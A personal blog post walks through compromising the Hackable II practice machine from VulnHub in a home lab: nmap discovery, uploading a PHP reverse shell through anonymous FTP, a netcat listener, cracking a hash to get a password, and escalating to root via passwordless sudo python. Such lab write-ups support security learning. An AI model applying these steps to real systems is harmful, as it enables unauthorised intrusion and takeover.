Wintermute's Blog: July 2021

I've recently regained interest in cyber security, so have been practicing on some of the CtF machines available on VulnHub. I started with some easy machines, as it's been quite some time since I've played with any of this, so after doing a couple, using walktroughs, I downloaded Hackable II and imported it into VirtualBox, and set the network up as "Internal" on the same network as my Kali VirtualBox.

The first thing I did was run nmap to discover the IP of the new host:

sudo nmap 10.38.1.1/24

This revealed several servers running on the box:

Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)

Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extaordinary. So, back to nmap:

sudo nmap --script http-enum.nse 10.38.1.7

This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...

put temp.txt

Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:

put shell.php

And on my kali box:

nc -nlvp 1234

And then I refesh the page in Firefox and switch back to my netcat session and check to see what users are on this box...Interesting...

$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt

One user, shrek, and hmmm...

$ cat important.txt
run the script to see the data

/.runme.sh

Yeah... Not gonna run that... But...

$ cat /.runme.sh
!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'

So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and login via ssh and see what we can do with sudo...

$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

88 packages can be updated.
68 updates are security updates.

Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:

root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/

And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)

Wintermute's Blog

Monday, July 26, 2021

CaptureTheFlag - Hackable II